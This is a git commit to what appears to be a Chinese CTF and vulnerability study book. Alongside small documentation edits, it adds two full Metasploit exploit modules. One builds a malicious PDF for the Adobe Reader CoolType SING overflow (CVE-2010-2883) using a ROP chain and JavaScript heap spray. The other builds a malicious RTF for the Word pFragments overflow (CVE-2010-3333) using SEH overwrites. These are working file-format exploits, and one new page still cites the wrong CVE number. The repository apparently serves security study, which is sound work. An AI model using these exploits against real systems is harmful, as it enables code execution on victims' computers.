This commit is contained in:
firmianay 2018-05-22 15:21:13 +08:00
parent 382cad2cdb
commit 9c5d6239c3
24 changed files with 852 additions and 29 deletions

View File

@ -59,6 +59,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [2.4.4 binwalk](doc/2.4.4_binwalk.md)
* [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md)
* [2.4.6 Wireshark](doc/2.4.6_wireshark.md)
* [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md)
* [三、分类专题篇](doc/3_topics.md)
* Pwn
* [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md)
@ -156,10 +157,11 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)
* [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md)
* [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md)
* [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
* [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
* [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md)
* [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md)
* [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md)
* Web
* [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md)
* Crypto
@ -175,7 +177,7 @@ GitHub 地址https://github.com/firmianay/CTF-All-In-One
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md)
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md)
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md)
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md)
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md)
* Malware
* [八、学术篇](doc/8_academic.md)
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)

View File

@ -1,10 +1,21 @@
# 2.3.2 OllyDbg 调试器
- [快捷键](#快捷键)
- [命令行插件](#命令行插件)
- [参考资料](#参考资料)
## 快捷键
- F2在光标选定位置按 F2 键设置或取消断点。
- F4运行到光标选定位置处暂停。
- F7单步步入每次执行一条指令遇到 call 等子程序时进入其中。
- F8单步步过每次执行一条指令遇到 call 等子程序时不进入其中。
- F9运行被调试软件继续运行直到遇到下一个断点。
- Ctrl+F9执行到返回在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。
- Alt+F9执行到用户代码可用于从系统部分快速返回到被调试程序部分。
## 命令行插件
## 参考资料
- http://www.ollydbg.de/

13
doc/2.4.7_cuckoo.md Normal file
View File

@ -0,0 +1,13 @@
# 2.4.7 Cuckoo Sandbox
- [简介](#简介)
- [安装](#安装)
- [参考资料](#参考资料)
## 简介
## 安装
## 参考资料
- https://cuckoosandbox.org/

View File

@ -24,3 +24,4 @@
* [2.4.4 binwalk](2.4.4_binwalk.md)
* [2.4.5 Burp Suite](2.4.5_burpsuite.md)
* [2.4.6 Wireshark](2.4.6_wireshark.md)
* [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md)

View File

@ -23,7 +23,6 @@
```
$ git clone https://github.com/Z3Prover/z3.git
$ cd z3
$ python scripts/mk_make.py --python
$ cd build
$ make

View File

@ -2,5 +2,7 @@
- [参考资料](#参考资料)
## 参考资料
- [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf)
- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution)

View File

@ -1,10 +1,10 @@
# 6.2.3 re Codegate2017 angrybird
# 6.2.3 re CodegateCTF2017 angrybird
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird)
[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird)
## 题目解析
看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。
@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:)
## 参考资料
- https://ctftime.org/task/3375

View File

@ -1,10 +1,10 @@
# 6.2.6 re SECCON2017 printf_machine
# 6.2.6 re SECCONCTF2017 printf_machine
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine)
[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine)
## 题目解析
```
@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l
## 参考资料
- https://ctftime.org/task/5042
- [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine)

View File

@ -0,0 +1,17 @@
# 6.2.7 re CodegateCTF2018 RedVelvet
- [题目解析](#题目解析)
- [参考资料](#参考资料)
[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet)
## 题目解析
```
$ file RedVelvet
RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped
```
## 参考资料
- https://ctftime.org/task/5231

View File

@ -4,6 +4,8 @@
- [解题流程](#解题流程)
[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack)
## 题目解析
题目就不用多说了,很容易发现是 JavaScript 代码审计。

View File

@ -32,10 +32,11 @@
* Reverse
* [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
* [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)
* [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md)
* [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md)
* [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md)
* [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md)
* [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md)
* [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md)
* [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md)
* Web
* [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md)
* Crypto

View File

@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的
| --- | --- | --- |
| 操作系统 | Windows XP SP3 | 体系结构32 位 |
| 调试器 | OllyDbg | 版本号:吾爱专版 |
| 反汇编器 | IDA Pro | 版本号6.8 |
| 漏洞软件 | Adobe Reader | 版本号9.3.4 |
我们利用 Metasploit 来生成攻击样本:

View File

@ -1,18 +0,0 @@
# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞
- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)
[下载文件](../src/exploit/7.1.9_ms_word_2010-2333)
## 漏洞描述
## 漏洞复现
## 漏洞分析
## 参考资料
- https://www.cvedetails.com/cve/CVE-2010-2333

View File

@ -0,0 +1,29 @@
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
## 漏洞描述
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出可能导致任意代码执行。受影响的版本有MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
## 漏洞复现
| |推荐使用的环境 | 备注 |
| --- | --- | --- |
| 操作系统 | Windows XP SP3 | 体系结构32 位 |
| 调试器 | OllyDbg | 版本号:吾爱专版 |
| 反汇编器 | IDA Pro | 版本号7.0 |
| 漏洞软件 | MS Office | 版本号2003 SP3 |
我们利用 Metasploit 来生成攻击样本
## 漏洞分析
## 参考资料
- https://www.cvedetails.com/cve/CVE-2010-2333

View File

@ -9,5 +9,5 @@
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md)
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md)
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md)
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md)
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md)
* Malware

View File

@ -0,0 +1,562 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table
handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are
assumed to be vulnerable as well.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # 0day found in the wild
'sn0wfl0w', # initial analysis, also @vicheck on twitter
'jduck' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-2883' ],
[ 'OSVDB', '67849'],
[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd
# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd
# Tested OK via Adobe Reader 9.3 on XP and 7 -todb
[ 'Automatic', { }],
],
'DisclosureDate' => 'Sep 07 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
ttf_data = make_ttf()
js_data = make_js(payload.encoded)
# Create the pdf
pdf = make_pdf(ttf_data, js_data)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def make_ttf
ttf_data = ""
# load the static ttf file
# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)
path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )
fd = File.open( path, "rb" )
ttf_data = fd.read(fd.stat.size)
fd.close
# Build the SING table
sing = ''
sing << [
0, 1, # tableVersionMajor, tableVersionMinor (0.1)
0xe01, # glyphletVersion
0x100, # embeddingInfo
0, # mainGID
0, # unitsPerEm
0, # vertAdvance
0x3a00 # vertOrigin
].pack('vvvvvvvv')
# uniqueName
# "The uniqueName string must be a string of at most 27 7-bit ASCII characters"
#sing << "A" * (0x254 - sing.length)
sing << rand_text(0x254 - sing.length)
# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)
sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')
# This becomes our new EIP (puts esp to stack buffer)
ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret
sing[0x208, 4] = [ret].pack('V')
# This becomes the new eip after the first return
ret = 0x4a82a714
sing[0x18, 4] = [ret].pack('V')
# This becomes the new esp after the first return
esp = 0x0c0c0c0c
sing[0x1c, 4] = [esp].pack('V')
# Without the following, sub_801ba57 returns 0.
sing[0x24c, 4] = [0x6c].pack('V')
ttf_data[0xec, 4] = "SING"
ttf_data[0x11c, sing.length] = sing
ttf_data
end
def make_js(encoded_payload)
# The following executes a ret2lib using icucnv36.dll
# The effect is to bypass DEP and execute the shellcode in an indirect way
stack_data = [
0x41414141, # unused
0x4a8063a5, # pop ecx / ret
0x4a8a0000, # becomes ecx
0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as
0x4a801f90, # pop eax / ret
0x4a84903c, # becomes eax (import for CreateFileA)
# -- call CreateFileA
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591")
0x10000000, # second arg - dwDesiredAccess
0x00000000, # third arg - dwShareMode
0x00000000, # fourth arg - lpSecurityAttributes
0x00000002, # fifth arg - dwCreationDisposition
0x00000102, # sixth arg - dwFlagsAndAttributes
0x00000000, # seventh arg - hTemplateFile
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx - offset to modify
#
# This points at a neat-o block of code that ... TBD
#
# and [esp+ebx*2],edi
# jne check_slash
# ret_one:
# mov al,1
# ret
# check_slash:
# cmp al,0x2f
# je ret_one
# cmp al,0x41
# jl check_lower
# cmp al,0x5a
# jle check_ptr
# check_lower:
# cmp al,0x61
# jl ret_zero
# cmp al,0x7a
# jg ret_zero
# cmp [ecx+1],0x3a
# je ret_one
# ret_zero:
# xor al,al
# ret
#
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849038, # becomes eax (import for CreateFileMappingA)
# -- call CreateFileMappingA
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0xffffffff, # arguments to CreateFileMappingA, hFile
0x00000000, # lpAttributes
0x00000040, # flProtect
0x00000000, # dwMaximumSizeHigh
0x00010000, # dwMaximumSizeLow
0x00000000, # lpName
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000008, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849030, # becomes eax (import for MapViewOfFile
# -- call MapViewOfFile
0x4a80b692, # jmp [eax]
0x4a801064, # ret
0xffffffff, # args to MapViewOfFile - hFileMappingObject
0x00000022, # dwDesiredAccess
0x00000000, # dwFileOffsetHigh
0x00000000, # dwFileOffsetLow
0x00010000, # dwNumberOfBytesToMap
0x4a8063a5, # pop ecx / ret
0x4a8a0004, # becomes ecx - writable pointer
0x4a802196, # mov [ecx],eax / ret - save map base addr
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000030, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a8a0004, # becomes eax - saved file mapping ptr
0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x00000020, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret
0x4a801f90, # pop eax / ret
0x00000034, # becomes eax
0x4a80d585, # add eax,edx / ret
0x4a8063a5, # pop ecx / ret
0x4a801064, # becomes ecx - ptr to ret
0x4a842db2, # xchg eax,edi / ret
0x4a802ab1, # pop ebx / ret
0x0000000a, # becomes ebx - offset to modify
0x4a80a8a6, # execute fun block
0x4a801f90, # pop eax / ret
0x4a849170, # becomes eax (import for memcpy)
# -- call memcpy
0x4a80b692, # jmp [eax]
0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy
0xffffffff, # becomes first arg to memcpy (dst)
0xffffffff, # becomes second arg to memcpy (src)
0x00001000, # becomes third arg to memcpy (length)
#0x0000258b, # ??
#0x4d4d4a8a, # ??
].pack('V*')
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
var_s = 0x10000
var_c = rand_text_alpha(rand(100) + 1)
var_b = rand_text_alpha(rand(100) + 1)
var_d = rand_text_alpha(rand(100) + 1)
var_3 = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_4 = rand_text_alpha(rand(100) + 1)
payload_buf = ''
payload_buf << stack_data
payload_buf << encoded_payload
escaped_payload = Rex::Text.to_unescape(payload_buf)
js = %Q|
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
#{var_b} += #{var_shellcode};
#{var_b} += #{var_c};
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
var #{var_4} = new Array();
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|
js
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj \n" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
#return str
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(ttf, js)
#swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
xref = []
eol = "\n"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
# catalog
xref << pdf.length
pdf << io_def(1) << n_obfu("<<") << eol
pdf << n_obfu("/Pages ") << io_ref(2) << eol
pdf << n_obfu("/Type /Catalog") << eol
pdf << n_obfu("/OpenAction ") << io_ref(11) << eol
# The AcroForm is required to get icucnv36.dll to load
pdf << n_obfu("/AcroForm ") << io_ref(13) << eol
pdf << n_obfu(">>") << eol
pdf << endobj
# pages array
xref << pdf.length
pdf << io_def(2) << n_obfu("<<") << eol
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
pdf << n_obfu("/Resources ") << io_ref(4) << eol
pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol
pdf << n_obfu("/Count 1") << eol
pdf << n_obfu("/Type /Pages") << eol
pdf << n_obfu(">>") << eol
pdf << endobj
# media box
xref << pdf.length
pdf << io_def(3)
pdf << "[0 0 595 842]" << eol
pdf << endobj
# resources
xref << pdf.length
pdf << io_def(4)
pdf << n_obfu("<<") << eol
pdf << n_obfu("/Font ") << io_ref(6) << eol
pdf << ">>" << eol
pdf << endobj
# page 1
xref << pdf.length
pdf << io_def(5) << n_obfu("<<") << eol
pdf << n_obfu("/Parent ") << io_ref(2) << eol
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
pdf << n_obfu("/Resources ") << io_ref(4) << eol
pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol
pdf << n_obfu("/Type /Page") << eol
pdf << n_obfu(">>") << eol # end obj dict
pdf << endobj
# font
xref << pdf.length
pdf << io_def(6) << n_obfu("<<") << eol
pdf << n_obfu("/F1 ") << io_ref(7) << eol
pdf << ">>" << eol
pdf << endobj
# ttf object
xref << pdf.length
pdf << io_def(7) << n_obfu("<<") << eol
pdf << n_obfu("/Type /Font") << eol
pdf << n_obfu("/Subtype /TrueType") << eol
pdf << n_obfu("/Name /F1") << eol
pdf << n_obfu("/BaseFont /Cinema") << eol
pdf << n_obfu("/Widths []") << eol
pdf << n_obfu("/FontDescriptor ") << io_ref(9)
pdf << n_obfu("/Encoding /MacRomanEncoding")
pdf << n_obfu(">>") << eol
pdf << endobj
# page content
content = "Hello World!"
content = "" +
"0 g" + eol +
"BT" + eol +
"/F1 32 Tf" + eol +
"32 Tc" + eol +
"1 0 0 1 32 773.872 Tm" + eol +
"(" + content + ") Tj" + eol +
"ET"
xref << pdf.length
pdf << io_def(8) << "<<" << eol
pdf << n_obfu("/Length %s" % content.length) << eol
pdf << ">>" << eol
pdf << "stream" << eol
pdf << content << eol
pdf << "endstream" << eol
pdf << endobj
# font descriptor
xref << pdf.length
pdf << io_def(9) << n_obfu("<<")
pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema")
pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17))
pdf << n_obfu("/FontBBox [-177 -269 1123 866]")
pdf << n_obfu("/FontFile2 ") << io_ref(10)
pdf << n_obfu(">>") << eol
pdf << endobj
# ttf stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ttf)
pdf << io_def(10) << n_obfu("<</Length %s/Filter/FlateDecode/Length1 %s>>" % [compressed.length, ttf.length]) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
# js action
xref << pdf.length
pdf << io_def(11) << n_obfu("<<")
pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12)
pdf << n_obfu(">>") << eol
pdf << endobj
# js stream
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(12) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
###
# The following form related data is required to get icucnv36.dll to load
###
# form object
xref << pdf.length
pdf << io_def(13)
pdf << n_obfu("<</XFA ") << io_ref(14) << n_obfu(">>") << eol
pdf << endobj
# form stream
xfa = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
EOF
xref << pdf.length
pdf << io_def(14) << n_obfu("<</Length %s>>" % xfa.length) << eol
pdf << "stream" << eol
pdf << xfa << eol
pdf << "endstream" << eol
pdf << endobj
###
# end form stuff for icucnv36.dll
###
# trailing stuff
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << eol
pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
pdf
end
end

Binary file not shown.

View File

@ -0,0 +1,199 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
The Microsoft Word RTF parser was only used by default in versions of Microsoft
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
began using the Word RTF parser, by default, to handle rich-text messages within
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
the Microsoft Word engine too, but it was not a default setting.
It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that
Microsoft will confirm or deny this since Office 2000 has reached its support
cycle end-of-life.
},
'License' => MSF_LICENSE,
'Author' =>
[
'wushi of team509', # original discovery
'unknown', # exploit found in the wild
'jduck', # Metasploit module
'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz
],
'References' =>
[
[ 'CVE', '2010-3333' ],
[ 'OSVDB', '69085' ],
[ 'MSB', 'MS10-087' ],
[ 'BID', '44652' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
# This automatic target will combine all targets into one file :)
[ 'Automatic', { } ],
# Office v10.6854.6845, winword.exe v10.0.6854.0
[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',
{
'Offsets' => [ 23532, 45944 ],
#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0
'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0
}
],
# Office v11.8307.8324, winword.exe v11.0.8307.0
# Office v11.8328.8221, winword.exe v11.0.8328.0
[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
{
'Offsets' => [ 24580, 51156 ],
'Ret' => 0x30001bdd # p/p/r in winword.exe
}
],
# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.
# Office v12.0.6425.1000, winword.exe v12.0.6425.1000
[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record
}
],
[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
}
],
[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',
{
'Offsets' => [ 5956 ],
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
}
],
# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{
'Offsets' => [ 65535 ],
'Ret' => 0xdac0ffee
}
]
],
'DisclosureDate' => 'Nov 09 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),
])
end
def add_target(rest, targ)
targ['Offsets'].each { |off|
seh = generate_seh_record(targ.ret)
rest[off, seh.length] = seh
distance = off + seh.length
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
rest[off + seh.length, jmp_back.length] = jmp_back
}
end
def exploit
# Prepare a sample SEH frame and backward jmp for length calculations
seh = generate_seh_record(0xdeadbeef)
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string
# RTF property Array parameters
el_size = sz_rand()
el_count = sz_rand()
data = ''
# These words are presumably incorrectly used
# assert(amount1 <= amount2)
data << [0x1111].pack('v') * 2
data << [0xc8ac].pack('v')
# Filler
if target.name =~ /Debug/i
rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)
else
len = 51200 + rand(1000)
rest = rand_text(len + seh.length + jmp_back.length)
rest[0, payload.encoded.length] = payload.encoded
end
# Stick fake SEH frames here and there ;)
if target.name == "Automatic"
targets.each { |t|
next if t.name !~ /Windows/i
add_target(rest, t)
}
else
add_target(rest, target)
end
# Craft the array for the property value
sploit = "%d;%d;" % [el_size, el_count]
sploit << data.unpack('H*').first
sploit << rest.unpack('H*').first
# Assemble it all into a nice RTF
content = "{\\rtf1"
content << "{\\shp" # shape
content << "{\\sp" # shape property
content << "{\\sn pFragments}" # property name
content << "{\\sv #{sploit}}" # property value
content << "}"
content << "}"
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
def sz_rand
bad_sizes = [ 0, 2, 4, 8 ]
x = rand(9)
while bad_sizes.include? x
x = rand(9)
end
x
end
end